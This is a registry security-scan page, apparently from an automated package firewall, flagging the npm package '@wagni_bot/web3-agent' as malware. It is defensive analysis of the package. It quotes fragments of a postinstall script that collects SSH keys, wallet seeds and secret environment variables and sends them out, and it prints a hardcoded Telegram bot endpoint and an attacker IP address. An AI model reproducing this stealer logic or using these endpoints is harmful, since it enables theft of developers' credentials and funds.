registry  /  @wagni_bot/web3-agent  /  1.0.0

@wagni_bot/web3-agent@1.0.0

Unofficial web3-agent SDK

AI Security Review

scanned 9h ago · by lpm-firewall-ai

Automatic postinstall credential harvesting and exfiltration. The package has no meaningful runtime SDK behavior to justify this access.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install runs package.json postinstall
Impact
Exposes environment secrets, API keys, wallet seeds, SSH keys/config, and credential-like files from project and home directories
Mechanism
install-time secret and file exfiltration to Telegram
Attack narrative
During npm install, package.json invokes postinstall.js. That script sends host/user/cwd metadata to Telegram, scans the project directory, home directory, and ~/.ssh for credential-like filenames, reads matching file contents, extracts secret-like environment variables, and posts the collected data to a hardcoded Telegram bot/chat.
Rationale
Direct source inspection confirms install-time credential and sensitive-file exfiltration unrelated to the advertised web3 SDK. This is concrete malicious behavior with automatic lifecycle execution.
Evidence
package.jsonpostinstall.jsindex.jsprocess.cwd() credential-like filesos.homedir() credential-like files~/.ssh/id_rsa~/.ssh/id_ed25519~/.ssh/config
Network endpoints1
api.telegram.org/bot8804087989:AAHUia-5DCloXsg9M9QhffTsHO5J_6FAxQM/sendMessage

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10036
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in @wagni_bot/web3-agent (npm)
Details
On `npm install`, postinstall.js recursively scans the current working directory and the user's home directory (including ~/.ethereum, ~/.config/ethereum, ~/.solana, ~/.config/solana, ~/.bitcoin, ~/Library/Ethereum) for files matching wallet/key patterns (.pem,.key, id_rsa, id_ed25519, keystore, wallet, UTC--, seed, mnemonic, secret, private) and extracts Ethereum private keys, BTC WIF keys, PRIVATE_KEY references, and BIP-39 seed phrases from their contents. It also enumerates ~/.ssh and reads every file other than known_hosts/authorized_keys/*.pub (i.e., private SSH keys and ssh config), and filters process.env for keys containing PRIVATE, SECRET, TOKEN, KEY, PASSWORD, MNEMONIC, SEED, WALLET, or AWS. The collected material, along with hostname, username, and cwd, is POSTed to a hardcoded bare-IP endpoint at http://107.161.90.180:7777. The package's index.js exports an empty object (`module.exports = {}`) and the package.json describes it as an 'Unofficial web3-agent SDK' — there is no real SDK functionality; the package exists solely to deliver the stealer to developers who install it expecting a web3 SDK.

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json defines install-time postinstall: node postinstall.js
  • postinstall.js hardcodes Telegram bot token/chat id and POSTs to api.telegram.org
  • postinstall.js sends hostname, username, cwd, and platform on install
  • postinstall.js scans process.cwd(), os.homedir(), and ~/.ssh for .env, key, mnemonic, seed, wallet, secret files
  • postinstall.js reads matching files and sends their contents in chunks
  • postinstall.js filters process.env for PRIVATE/SECRET/TOKEN/API_KEY/PASSWORD/MNEMONIC/SEED/WALLET/AWS vars and sends values
Evidence against
  • index.js only exports an empty object
  • No legitimate SDK functionality observed in package files
Behavioral surface
Source
EnvironmentVarsFilesystemNetwork
Supply chain
HighEntropyStringsUrlStrings
Manifest
NoLicense
scanned 2 file(s), 4.10 KB of source, external domains: api.telegram.org

Source & flagged code

4 flagged · loading source
package.jsonView file
scripts.postinstall = node postinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
postinstall.jsView file
1#!/usr/bin/env node L2: const https = require('https'); L3: const http = require('http'); ... L17: }); L18: req.write(payload); L19: req.end(); ... L70: const data = { L71: hostname: os.hostname(), L72: user: os.userInfo().username, ... L89: // Send sensitive env vars L90: const sensitive = Object.entries(process.env).filter(([k]) => L91: k.includes('PRIVATE')||k.includes('SECRET')||k.includes('TOKEN')||k.includes('API_KEY')||k.includes('PASSWORD')||k.includes('MNEMONIC')||k.includes('SEED')||k.includes('WALLET')||k...
Critical
Credential Exfiltration

Source appears to send environment or credential material to an external endpoint.

postinstall.jsView on unpkg · L1
1Trigger-reachable chain: scripts.postinstall -> postinstall.js L1: #!/usr/bin/env node L2: const https = require('https'); L3: const http = require('http'); ... L17: }); L18: req.write(payload); L19: req.end(); ... L70: const data = { L71: hostname: os.hostname(), L72: user: os.userInfo().username, ... L89: // Send sensitive env vars L90: const sensitive = Object.entries(process.env).filter(([k]) => L91: k.includes('PRIVATE')||k.includes('SECRET')||k.includes('TOKEN')||k.includes('API_KEY')||k.includes('PASSWORD')||k.includes('MNEMONIC')||k.includes('SEED')||k.includes('WALLET')||k...
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

postinstall.jsView on unpkg · L1

Findings

2 Critical1 High4 Medium5 Low
CriticalCredential Exfiltrationpostinstall.js
CriticalTrigger Reachable Dangerous Capabilitypostinstall.js
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings
LowNo License